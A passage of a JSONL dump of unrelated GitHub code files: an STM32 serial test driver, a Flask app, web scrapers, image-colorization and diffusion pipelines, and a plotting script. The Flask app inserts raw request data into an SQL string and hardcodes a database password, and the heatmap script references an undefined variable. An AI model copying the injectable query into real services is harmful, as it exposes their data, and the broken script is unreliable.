on_before_execution(self):\n\n # open serial port\n tmp_dev = serial.Serial()\n tmp_dev.port = self.usb_path\n tmp_dev.baudrate = self.baud_rate\n tmp_dev.parity = serial.PARITY_NONE\n tmp_dev.bytesize = serial.EIGHTBITS\n tmp_dev.stopbits = 
serial.STOPBITS_ONE\n tmp_dev.timeout = 0.01\n tmp_dev.writeTimeout = None\n\n # open input waveform file but get rid of the metadata part\n self.fin = open(self.input_waveform_path, 'r')\n while True:\n line = self.fin.readline()\n if not line or line.strip() == '==':\n break\n\n # open output waveform file and write the meatadata part\n self.output_lines = []\n self.output_lines.append('') # period\n self.output_lines.append('Tick frequency: %f' % self.output_metadata['tick_frequency'])\n self.output_lines.append('Display start')\n for pin_config in self.output_metadata['pins']:\n self.output_lines.append('%s,%s' % (\n pin_config['label'],\n ','.join(list(map(str, pin_config['indexes']))),\n ))\n self.output_lines.append('Display end')\n self.output_lines.append('==')\n\n self.alive = True\n \n try:\n tmp_dev.open() \n self.dev = tmp_dev\n print('(STM32) UART is open')\n self.send_command(self.CMD_RESET_TESTER)\n print('(STM32) reset')\n time.sleep(1)\n self.uart_reading_thread = threading.Thread(\n target=self._reading_thread, name=('STM32-%s-reading' % self.name)).start()\n except:\n exc_info = sys.exc_info()\n print('(STM32) UART device unable to open, full stack trace below')\n traceback.print_exception(*exc_info)\n self.alive = False\n\n def on_execute(self):\n self.execution_start_time = time.time()\n\n # feed input waveform file into STM32\n for line in self.fin:\n if not self.alive:\n break\n terms = line.split(',')\n pkt_type, pkt_time, pkt_val = chr(int(terms[0])), int(terms[1]), int(terms[2])\n binary = struct.pack('=ccIHc', self.START_DELIM, pkt_type.encode('ascii'), pkt_time,\n pkt_val, self.STOP_DELIM)\n if not self.dev:\n print('(STM32) UART device does not exist, not able to send the command')\n return\n self.dev.write(binary)\n print('(STM32) packet sent', pkt_type, pkt_time, pkt_val)\n\n self.fin.close()\n\n def on_terminate(self):\n self.alive = False\n \n execution_stop_time = time.time()\n execution_elasped_time = execution_stop_time - self.execution_start_time\n self.output_lines[0] = \"Period: %f\" % execution_elasped_time\n\n with open(self.output_waveform_path, 'w') as fo:\n fo.write('\\n'.join(self.output_lines))\n \n def on_reset_after_execution(self):\n \n try:\n self.dev.flush()\n self.dev.close()\n print('(STM32) UART is closed')\n except:\n print('(STM32) UART device unable to close')\n self.dev = None\n\n def __del__(self):\n if self.dev and self.dev.is_open:\n self.dev.close()\n\n def _reading_thread(self):\n rx_buffer = b''\n\n while self.alive:\n # continue immediately if serial isn't ready\n if not self.dev:\n continue\n\n # Because we set a read timeout, chances are we only get a \n # partial of a packet\n rx_buffer += self.dev.read(self.TOTAL_PKT_LEN)\n \n # Thus, if it's not a complete packet yet, read more\n if len(rx_buffer) < self.TOTAL_PKT_LEN:\n continue\n\n # check the packet is valid via start and stop byte\n # (The reason that we have to use bytes[0:1] is that var[0] returns an int)\n if rx_buffer[0:1] == self.START_DELIM and rx_buffer[8:9] == self.STOP_DELIM:\n self._handle_packet_payload(rx_buffer[1:8])\n else:\n print('(STM32) bad packet!', rx_buffer[0:9])\n\n rx_buffer = rx_buffer[9:]\n \n def _handle_packet_payload(self, binary):\n # 1B type, 4B time, 2B val\n [pkt_type, pkt_time, pkt_val] = struct.unpack('<cLH', binary)\n try:\n pkt_type = pkt_type.decode('ascii')\n except:\n print('(STM32) Cannot handle the packet...')\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback, 
file=sys.stdout)\n return\n \n print('type: %s, time: %d, val: %d' % (pkt_type, pkt_time, pkt_val))\n if pkt_type is not self.CMD_TERMINATE:\n self.output_lines.append('%d, %d, %d' % (ord(pkt_type), pkt_time, pkt_val))\n else:\n self.hardware_engine.notify_terminate()\n self.alive = False\n \n def send_command(self, cmd):\n payload = self.START_DELIM + cmd.encode() + b'\\x00\\x00\\x00\\x00\\x00\\x00' + self.STOP_DELIM\n self.dev.write(payload)\n \n","repo_name":"nesl/hart_comm","sub_path":"AutoGrader/devices/STM32.py","file_name":"STM32.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15854857318","text":"from flask import Flask\nfrom flask import request\nimport psycopg2\nimport sys\n\ncon = psycopg2.connect(host='postgres', port='5432', database='postgres', user='postgres', password='secret')\ncur = con.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS reverse (input VARCHAR(255), output VARCHAR(255))\")\ncon.commit()\n\napp = Flask(__name__)\n@app.route(\"/reverse\", methods = [\"POST\"])\ndef reverse():\n reverse = request.get_data()[::-1]\n cur = con.cursor()\n cur.execute(\"INSERT INTO reverse VALUES ('\" + request.get_data() + \"', '\" + reverse + \"')\")\n con.commit()\n return reverse\n\n@app.route(\"/cache\", methods = [\"GET\"])\ndef get():\n cur = con.cursor()\n cur.execute('SELECT * FROM reverse')\n return str(cur.fetchall())\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"Unarmed/docker-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35364918900","text":"from bs4 import BeautifulSoup\nimport requests\nimport lxml\nimport csv\n\n\n# получим суп\ndef get_soup(url):\n response = requests.get(url=url)\n response.encoding = 'utf-8'\n\n soup = BeautifulSoup(response.text, 'lxml')\n\n return soup\n\n# получим пагинацию\ndef get_pagen(url, shema):\n\n soup = get_soup(url)\n \n pagen = soup.find('div', class_='pagen').find_all('a')\n pagen = [f\"{shema}{link['href']}\" for link in soup.find('div', class_='pagen').find_all('a')]\n\n return pagen\n\nshema = 'http://parsinger.ru/html/'\n\nurls = ['http://parsinger.ru/html/index1_page_1.html',\n 'http://parsinger.ru/html/index2_page_1.html',\n 'http://parsinger.ru/html/index3_page_1.html',\n 'http://parsinger.ru/html/index4_page_1.html',\n 'http://parsinger.ru/html/index5_page_1.html']\n\npagen = []\n\nfor url in urls:\n pagen.append(get_pagen(url, shema))\n\npagen = sum(pagen, []) #преобразуем список списков в простой список\n\ndata = []\nfor page in pagen:\n\n soup = get_soup(page)\n\n cards = soup.find_all('div', class_='item')\n for card in cards:\n try:\n name = card.find('a', class_='name_item').text.lstrip()\n description = card.find('div', class_='description').text.split('\\n')\n brand = description[1].split(': ')[1].strip()\n spec_1 = description[2].split(': ')[1].strip()\n spec_2 = description[3].split(': ')[1].strip()\n spec_3 = description[4].split(': ')[1].strip()\n price = card.find('p', class_='price').text.replace(' руб', '').strip()\n except:\n pass\n\n data.append((name, brand, spec_1, spec_2, spec_3, price))\n \n# сохраняем данные в csv-файл\nwith open('data.csv', 'w', encoding='utf-8-sig', newline='') as file:\n writer = csv.writer(file, delimiter=',')\n 
writer.writerows(data)","repo_name":"ivan-varyukhin/bs4_parsers","sub_path":"parsing2csv_4-9-5.py","file_name":"parsing2csv_4-9-5.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38363324901","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nsys.path.append('build/lib.linux-x86_64-2.7')\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.python.framework import meta_graph\nimport picpac\nimport _pic2pic\nfrom gallery import Gallery\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('db', None, '')\nflags.DEFINE_string('output', None, '')\nflags.DEFINE_string('model', 'model', 'Directory to put the training data.')\nflags.DEFINE_integer('stride', 8, '')\nflags.DEFINE_integer('downsize', 4, 'has no effect')\nflags.DEFINE_integer('max', 32, '')\nflags.DEFINE_float('T', None, '')\nflags.DEFINE_float('s_add', None, '')\nflags.DEFINE_float('s_mul', None, '')\n\ndef main (_):\n assert FLAGS.db and os.path.exists(FLAGS.db)\n assert FLAGS.model and os.path.exists(FLAGS.model + '.meta')\n\n GRAY = tf.placeholder(tf.float32, shape=(None, None, None, 1))\n\n mg = meta_graph.read_meta_graph_file(FLAGS.model + '.meta')\n COLOR, = tf.import_graph_def(mg.graph_def, name='colorize',\n #input_map={'L:0':L},\n input_map={'gray:0':GRAY},\n return_elements=['color:0'])\n #prob = tf.nn.softmax(logits)\n saver = tf.train.Saver(saver_def=mg.saver_def, name='colorize')\n\n picpac_config = dict(seed=2016,\n cache=False,\n max_size=200,\n min_size=192,\n crop_width=192,\n crop_height=192,\n shuffle=True,\n #reshuffle=True,\n batch=1,\n round_div=FLAGS.stride,\n channels=3,\n stratify=False,\n channel_first=False # this is tensorflow specific\n # Caffe's dimension order is different.\n )\n\n stream = picpac.ImageStream(FLAGS.db, perturb=False, loop=False, **picpac_config)\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver.restore(sess, FLAGS.model)\n gallery = Gallery(FLAGS.output, cols=2, header=['groundtruth', 'prediction'])\n c = 0\n for images, _, _ in stream:\n if FLAGS.max and (c >= FLAGS.max):\n break\n gray, _, _ = _pic2pic.encode_bgr(images.copy(), FLAGS.downsize)\n #l, ab, w = _pic2pic.encode_lab(images.copy(), FLAGS.downsize)\n #\n color, = sess.run([COLOR], feed_dict={GRAY: gray})\n\n cv2.imwrite(gallery.next(), gray[0])\n\n full = np.zeros(images.shape, dtype=np.float32)\n color /= 255.0\n gray /= 255.0\n _, H, W, _ = images.shape\n for i in range(images.shape[0]):\n lab = cv2.cvtColor(cv2.cvtColor(gray[i], cv2.COLOR_GRAY2BGR), cv2.COLOR_BGR2LAB)\n print(lab.shape)\n full[i, :, :, :1] = lab[:, :, :1]\n one = cv2.resize(color[i], (W, H))\n\n lab = cv2.cvtColor(one, cv2.COLOR_BGR2LAB)\n full[i, :, :, 1:] = lab[:, :, 1:]\n cv2.cvtColor(full[i], cv2.COLOR_LAB2BGR, full[i])\n if FLAGS.s_add and FLAGS.s_mul:\n hsv = cv2.cvtColor(full[i], cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n s *= FLAGS.s_mul\n s += FLAGS.s_add\n hsv = cv2.merge([h, s, v])\n cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR, full[i])\n pass\n full *= 255\n cv2.imwrite(gallery.next(), full[0])\n #y_p = decode_lab(l, ab_p, T=FLAGS.T)\n c += 1\n print('%d/%d' % (c, FLAGS.max))\n pass\n gallery.flush()\n pass\n pass\n\nif __name__ == '__main__':\n 
tf.app.run()\n\n","repo_name":"aaalgo/pic2pic","sub_path":"gan-colorize-val.py","file_name":"gan-colorize-val.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41672794051","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_amazon(keyword):\n url = f'https://www.amazon.in/s?k={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n results = []\n for product in products:\n name_elem = product.find('span', {'class': 'a-size-medium'})\n price_elem = product.find('span', {'class': 'a-offscreen'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\ndef scrape_walmart(keyword):\n url = f'https://www.walmart.com/search/?query={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'class': 'search-result-product-title'})\n\n results = []\n for product in products:\n name_elem = product.find('a')\n price_elem = product.find_next('span', {'class': 'price-group'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\n# Example usage\nkeyword = 'laptop'\namazon_results = scrape_amazon(keyword)\nwalmart_results = scrape_walmart(keyword)\n\nif not amazon_results:\n print('No results found on Amazon.')\nelse:\n print('Amazon Results:')\n for result in amazon_results:\n print(result['name'], result['price'])\n\nif not walmart_results:\n print('No results found on Walmart.')\nelse:\n print('\\nWalmart Results:')\n for result in walmart_results:\n print(result['name'], result['price'])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NikeshKr/AmazonWebScrapper","sub_path":"amazonscrapper.py.py","file_name":"amazonscrapper.py.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3085715238","text":"# ******************************************************\n# Program: compare_fields.py\n# Author: Stefano Ubbiali\n# Email: subbiali@phys.ethz.ch\n# Date: 04.06.2020\n# Description: Comparing two NumPy arrays\n# ******************************************************\nimport click\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_field_from_file(filename, num_halo=None):\n (rank, nbits, num_halo, nx, ny, nz) = np.fromfile(filename, dtype=np.int32, count=6)\n offset=(3 + rank) * 32 // nbits\n data = np.fromfile(filename, dtype=np.float32 if nbits == 32 else np.float64, \\\n count=nz * ny * nx + offset)\n if rank == 3:\n return np.reshape(data[offset:], (nz, ny, nx))\n else:\n return np.reshape(data[offset:], (ny, nx))\n\nfig, axs = plt.subplots(1, 1) #, figsize=(12, 4))\n\nref_field = read_field_from_file('out_field_mpi.dat')\nhybrid_field = 
read_field_from_file('out_field_mpiomp.dat')\ncomp_field = hybrid_field - ref_field\n \nk_lev = in_field.shape[0] // 2\nim1 = axs[0].imshow(comp_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\nfig.colorbar(im1, ax=axs[0]);\naxs[0].set_title('Comparison field (k = {})'.format(k_lev));\n\n \n #k_lev = out_field.shape[0] // 2\n #im2 = axs[1].imshow(out_field[k_lev, :, :], origin='lower', vmin=-0.1, vmax=1.1);\n #fig.colorbar(im2, ax=axs[1]);\n #axs[1].set_title('Final result (k = {})'.format(k_lev));\n \nplt.savefig('test.png')","repo_name":"colintully92/HPCproject","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22863625418","text":"import math\nfrom typing import Any, Dict\n\nimport cv2\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom diffusers import LMSDiscreteScheduler, StableDiffusionPipeline\nfrom diffusers.models.attention_processor import Attention\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import \\\n StableDiffusionPipelineOutput\nfrom PIL import Image\nfrom tqdm.auto import tqdm\n\nfrom modelscope.metainfo import Pipelines\nfrom modelscope.outputs import OutputKeys\nfrom modelscope.pipelines.builder import PIPELINES\nfrom modelscope.pipelines.multi_modal.diffusers_wrapped.diffusers_pipeline import \\\n DiffusersPipeline\nfrom modelscope.utils.constant import Tasks\n\n\n@PIPELINES.register_module(\n Tasks.text_to_image_synthesis, module_name=Pipelines.cones2_inference)\nclass Cones2InferencePipeline(DiffusersPipeline):\n r\"\"\" Cones2 Inference Pipeline.\n\n Examples:\n\n >>> from modelscope.pipelines import pipeline\n\n >>> pipeline =pipeline(task=Tasks.text_to_image_synthesis, model= 'damo/Cones2', model_revision='v1.0.1')\n >>> {\n >>> \"text\": 'a mug and a dog on the beach',\n >>> \"subject_list\": [[\"mug\", 2], [\"dog\", 5]],\n >>> \"color_context\": {\"255,192,0\": [\"mug\", 2.5], \"255,0,0\": [\"dog\", 2.5]},\n >>> \"layout\": 'data/test/images/mask_example.png'\n >>> }\n >>>\n \"\"\"\n\n def __init__(self, model: str, device: str = 'gpu', **kwargs):\n \"\"\"\n use `model` to create a stable diffusion pipeline\n Args:\n model: model id on modelscope hub.\n device: str = 'gpu'\n \"\"\"\n super().__init__(model, device, **kwargs)\n self.pipeline = StableDiffusionPipeline.from_pretrained(model)\n self.pipeline.text_encoder.pooler = None\n self.pipeline.to(self.device)\n\n def forward(self, inputs: Dict[str, Any],\n **forward_params) -> Dict[str, Any]:\n if not isinstance(inputs, dict):\n raise ValueError(\n f'Expected the input to be a dictionary, but got {type(input)}'\n )\n if 'text' not in inputs:\n raise ValueError('input should contain \"text\", but not found')\n\n return self.layout_guidance_sampling(\n prompt=inputs.get('text'),\n residual_dict=inputs.get('residual_dict', None),\n subject_list=inputs.get('subject_list'),\n color_context=inputs.get('color_context', None),\n layout=inputs.get('layout', None),\n )\n\n @torch.no_grad()\n def layout_guidance_sampling(\n self,\n prompt='',\n residual_dict=None,\n subject_list=None,\n color_context=None,\n layout=None,\n cfg_scale=7.5,\n inference_steps=50,\n guidance_steps=50,\n guidance_weight=0.05,\n weight_negative=-1e8,\n ):\n\n layout = Image.open(layout).resize((768, 768)).convert('RGB')\n subject_color_dict = {\n tuple(map(int, key.split(','))): value\n for key, value in color_context.items()\n }\n\n vae = 
self.pipeline.vae\n unet = self.pipeline.unet\n text_encoder = self.pipeline.text_encoder\n tokenizer = self.pipeline.tokenizer\n unconditional_input_prompt = ''\n scheduler = LMSDiscreteScheduler.from_config(\n self.pipeline.scheduler.config)\n scheduler.set_timesteps(inference_steps, device=self.device)\n if guidance_steps > 0:\n guidance_steps = min(guidance_steps, inference_steps)\n scheduler_guidance = LMSDiscreteScheduler(\n beta_start=0.00085,\n beta_end=0.012,\n beta_schedule='scaled_linear',\n num_train_timesteps=1000,\n )\n scheduler_guidance.set_timesteps(\n guidance_steps, device=self.device)\n\n # Process input prompt text\n text_input = tokenizer(\n [prompt],\n padding='max_length',\n max_length=tokenizer.model_max_length,\n truncation=True,\n return_tensors='pt',\n )\n\n # Edit text embedding conditions with residual token embeddings.\n cond_embeddings = text_encoder(text_input.input_ids.to(self.device))[0]\n if residual_dict is not None:\n for name, token in subject_list:\n residual_token_embedding = torch.load(residual_dict[name])\n cond_embeddings[0][token] += residual_token_embedding.reshape(\n 1024)\n\n # Process unconditional input \"\" for classifier-free guidance.\n max_length = text_input.input_ids.shape[-1]\n uncond_input = tokenizer([unconditional_input_prompt],\n padding='max_length',\n max_length=max_length,\n return_tensors='pt')\n uncond_embeddings = text_encoder(\n uncond_input.input_ids.to(self.device))[0]\n\n register_attention_control(unet)\n\n # Calculate the hidden features for each cross attention layer.\n hidden_states, uncond_hidden_states = _extract_cross_attention(\n tokenizer, self.device, layout, subject_color_dict, text_input,\n weight_negative)\n hidden_states['CONDITION_TENSOR'] = cond_embeddings\n uncond_hidden_states['CONDITION_TENSOR'] = uncond_embeddings\n hidden_states['function'] = lambda w, sigma, qk: (\n guidance_weight * w * math.log(1 + sigma**2)) * qk.std()\n uncond_hidden_states['function'] = lambda w, sigma, qk: 0.0\n\n # Sampling the initial latents.\n latent_size = (1, unet.in_channels, 96, 96)\n latents = torch.randn(latent_size).to(self.device)\n latents = latents * scheduler.init_noise_sigma\n\n for i, t in tqdm(\n enumerate(scheduler.timesteps),\n total=len(scheduler.timesteps)):\n # Improve the harmony of generated images by self-recurrence.\n if i < guidance_steps:\n loop = 2\n else:\n loop = 1\n for k in range(loop):\n if i < guidance_steps:\n sigma = scheduler_guidance.sigmas[i]\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n\n hidden_states.update({'SIGMA': sigma})\n\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=hidden_states,\n ).sample\n\n uncond_hidden_states.update({'SIGMA': sigma})\n\n noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_hidden_states,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n # Self-recurrence.\n if k < 1 and loop > 1:\n noise_recurent = torch.randn(latents.shape).to(\n self.device)\n sigma_difference = scheduler.sigmas[\n i]**2 - scheduler.sigmas[i + 1]**2\n latents = latents + noise_recurent * (\n sigma_difference**0.5)\n else:\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n _t = t\n noise_pred_text = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=cond_embeddings,\n ).sample\n\n latent_model_input = scheduler.scale_model_input(\n latents, t)\n\n 
noise_pred_uncond = unet(\n latent_model_input,\n _t,\n encoder_hidden_states=uncond_embeddings,\n ).sample\n\n noise_pred = noise_pred_uncond + cfg_scale * (\n noise_pred_text - noise_pred_uncond)\n latents = scheduler.step(noise_pred, t, latents,\n 1).prev_sample\n\n edited_images = _latents_to_images(vae, latents)\n\n return StableDiffusionPipelineOutput(\n images=edited_images, nsfw_content_detected=None)\n\n def postprocess(self, inputs: Dict[str, Any], **kwargs) -> Dict[str, Any]:\n images = []\n for img in inputs.images:\n if isinstance(img, Image.Image):\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n images.append(img)\n return {OutputKeys.OUTPUT_IMGS: images}\n\n\nclass Cones2AttnProcessor:\n\n def __init__(self):\n super().__init__()\n\n def __call__(self,\n attn: Attention,\n hidden_states,\n encoder_hidden_states=None,\n attention_mask=None):\n batch_size, sequence_length, _ = hidden_states.shape\n query = attn.to_q(hidden_states)\n is_dict_format = True\n if encoder_hidden_states is not None:\n if 'CONDITION_TENSOR' in encoder_hidden_states:\n encoder_hidden = encoder_hidden_states['CONDITION_TENSOR']\n else:\n encoder_hidden = encoder_hidden_states\n is_dict_format = False\n else:\n encoder_hidden = hidden_states\n\n key = attn.to_k(encoder_hidden)\n value = attn.to_v(encoder_hidden)\n\n query = attn.head_to_batch_dim(query)\n key = attn.head_to_batch_dim(key)\n value = attn.head_to_batch_dim(value)\n\n attention_scores = torch.matmul(query, key.transpose(-1, -2))\n attention_size_of_img = attention_scores.size()[-2]\n\n if attention_scores.size()[2] == 77:\n if is_dict_format:\n f = encoder_hidden_states['function']\n try:\n w = encoder_hidden_states[\n f'CA_WEIGHT_{attention_size_of_img}']\n except KeyError:\n w = encoder_hidden_states['CA_WEIGHT_ORIG']\n if not isinstance(w, int):\n img_h, img_w, nc = w.shape\n ratio = math.sqrt(img_h * img_w\n / attention_size_of_img)\n w = F.interpolate(\n w.permute(2, 0, 1).unsqueeze(0),\n scale_factor=1 / ratio,\n mode='bilinear',\n align_corners=True)\n w = F.interpolate(\n w.reshape(1, nc, -1),\n size=(attention_size_of_img, ),\n mode='nearest').permute(2, 1, 0).squeeze()\n else:\n w = 0\n if type(w) is int and w == 0:\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n else:\n bias = torch.zeros_like(w)\n bias[torch.where(w > 0)] = attention_scores.std() * 0\n sigma = encoder_hidden_states['SIGMA']\n cross_attention_weight = f(w, sigma, attention_scores)\n cross_attention_weight = cross_attention_weight + bias\n else:\n cross_attention_weight = 0.0\n else:\n cross_attention_weight = 0.0\n\n attention_scores = (attention_scores\n + cross_attention_weight) * attn.scale\n attention_probs = attention_scores.softmax(dim=-1)\n\n hidden_states = torch.matmul(attention_probs, value)\n hidden_states = attn.batch_to_head_dim(hidden_states)\n\n # linear proj\n hidden_states = attn.to_out[0](hidden_states)\n # dropout\n hidden_states = attn.to_out[1](hidden_states)\n\n return hidden_states\n\n\ndef register_attention_control(unet):\n attn_procs = {}\n for name in unet.attn_processors.keys():\n attn_procs[name] = Cones2AttnProcessor()\n\n unet.set_attn_processor(attn_procs)\n\n\ndef _tokens_img_attention_weight(img_context_seperated,\n tokenized_texts,\n ratio: int = 8,\n original_shape=False):\n token_lis = tokenized_texts['input_ids'][0].tolist()\n w, h = img_context_seperated[0][1].shape\n\n w_r, h_r = round(w / ratio), round(h / ratio)\n ret_tensor = torch.zeros((w_r * h_r, 
len(token_lis)), dtype=torch.float32)\n for v_as_tokens, img_where_color in img_context_seperated:\n\n is_in = 0\n\n for idx, tok in enumerate(token_lis):\n if token_lis[idx:idx + len(v_as_tokens)] == v_as_tokens:\n is_in = 1\n\n ret_tensor[:, idx:idx + len(v_as_tokens)] += (\n _downsampling(img_where_color, w_r,\n h_r).reshape(-1,\n 1).repeat(1, len(v_as_tokens)))\n\n if not is_in == 1:\n print(\n f'Warning ratio {ratio} : tokens {v_as_tokens} not found in text'\n )\n\n if original_shape:\n ret_tensor = ret_tensor.reshape((w_r, h_r, len(token_lis)))\n\n return ret_tensor\n\n\ndef _image_context_seperator(img, color_context: dict, _tokenizer, neg: float):\n ret_lists = []\n if img is not None:\n w, h = img.size\n matrix = np.zeros((h, w))\n for color, v in color_context.items():\n color = tuple(color)\n if len(color) > 3:\n color = color[:3]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n\n for color, (subject, weight_active) in color_context.items():\n if len(color) > 3:\n color = color[:3]\n v_input = _tokenizer(\n subject,\n max_length=_tokenizer.model_max_length,\n truncation=True,\n )\n\n v_as_tokens = v_input['input_ids'][1:-1]\n if isinstance(color, str):\n r, g, b = color[1:3], color[3:5], color[5:7]\n color = (int(r, 16), int(g, 16), int(b, 16))\n img_where_color = (np.array(img) == color).all(axis=-1)\n matrix[img_where_color] = 1\n if not img_where_color.sum() > 0:\n print(\n f'Warning : not a single color {color} not found in image')\n\n img_where_color_init = torch.where(\n torch.tensor(img_where_color, dtype=torch.bool), weight_active,\n neg)\n\n img_where_color = torch.where(\n torch.from_numpy(matrix == 1) & (img_where_color_init == 0.0),\n torch.tensor(neg), img_where_color_init)\n\n ret_lists.append((v_as_tokens, img_where_color))\n else:\n w, h = 768, 768\n\n if len(ret_lists) == 0:\n ret_lists.append(([-1], torch.zeros((w, h), dtype=torch.float32)))\n return ret_lists, w, h\n\n\ndef _extract_cross_attention(tokenizer, device, color_map_image, color_context,\n text_input, neg):\n # Process color map image and context\n seperated_word_contexts, width, height = _image_context_seperator(\n color_map_image, color_context, tokenizer, neg)\n\n # Compute cross-attention weights\n cross_attention_weight_1 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=1,\n original_shape=True).to(device)\n cross_attention_weight_8 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=8).to(device)\n cross_attention_weight_16 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=16).to(device)\n cross_attention_weight_32 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=32).to(device)\n cross_attention_weight_64 = _tokens_img_attention_weight(\n seperated_word_contexts, text_input, ratio=64).to(device)\n\n hidden_states = {\n 'CA_WEIGHT_ORIG': cross_attention_weight_1, # 768 x 768\n 'CA_WEIGHT_9216': cross_attention_weight_8, # 96 x 96\n 'CA_WEIGHT_2304': cross_attention_weight_16, # 48 x 48\n 'CA_WEIGHT_576': cross_attention_weight_32, # 24 x 24\n 'CA_WEIGHT_144': cross_attention_weight_64, # 12 x 12\n }\n\n uncond_hidden_states = {\n 'CA_WEIGHT_ORIG': 0,\n 'CA_WEIGHT_9216': 0,\n 'CA_WEIGHT_2304': 0,\n 'CA_WEIGHT_576': 0,\n 'CA_WEIGHT_144': 0,\n }\n\n return hidden_states, uncond_hidden_states\n\n\ndef _downsampling(img: 
torch.tensor, w: int, h: int) -> torch.tensor:\n return F.interpolate(\n img.unsqueeze(0).unsqueeze(1),\n size=(w, h),\n mode='bilinear',\n align_corners=True,\n ).squeeze()\n\n\ndef _latents_to_images(vae, latents, scale_factor=0.18215):\n \"\"\"Decode latents to PIL images.\"\"\"\n scaled_latents = 1.0 / scale_factor * latents.clone()\n images = vae.decode(scaled_latents).sample\n images = (images / 2 + 0.5).clamp(0, 1)\n images = images.detach().cpu().permute(0, 2, 3, 1).numpy()\n\n if images.ndim == 3:\n images = images[None, ...]\n images = (images * 255).round().astype('uint8')\n pil_images = [Image.fromarray(image) for image in images]\n\n return pil_images\n\n\ndef _sanitize_parameters(self, **pipeline_parameters):\n \"\"\"\n this method should sanitize the keyword args to preprocessor params,\n forward params and postprocess params on '__call__' or '_process_single' method\n\n Returns:\n Dict[str, str]: preprocess_params = {'image_resolution': self.model.get_resolution()}\n Dict[str, str]: forward_params = pipeline_parameters\n Dict[str, str]: postprocess_params = {}\n \"\"\"\n pipeline_parameters['image_resolution'] = self.model.get_resolution()\n pipeline_parameters['modelsetting'] = self.model.get_config()\n pipeline_parameters['model_dir'] = self.model.get_model_dir()\n pipeline_parameters['control_type'] = self.init_control_type\n pipeline_parameters['device'] = self.device\n","repo_name":"modelscope/modelscope","sub_path":"modelscope/pipelines/multi_modal/cone2_pipeline/cones2_inference_pipeline.py","file_name":"cones2_inference_pipeline.py","file_ext":"py","file_size_in_byte":18735,"program_lang":"python","lang":"en","doc_type":"code","stars":4825,"dataset":"github-code","pt":"16"} +{"seq_id":"12989041603","text":"\"\"\"\nGiven a Tree class, create a method called add that accepts a Node, and inserts it into a tree such that the tree continues to be a Binary Search Tree. The method should return nothing.\n\nA Binary Search Tree is a tree where every node has values greater than its data on the right-hand side, and values less than its data on the left-hand side, and all of the sub-tree nodes follow suit. 
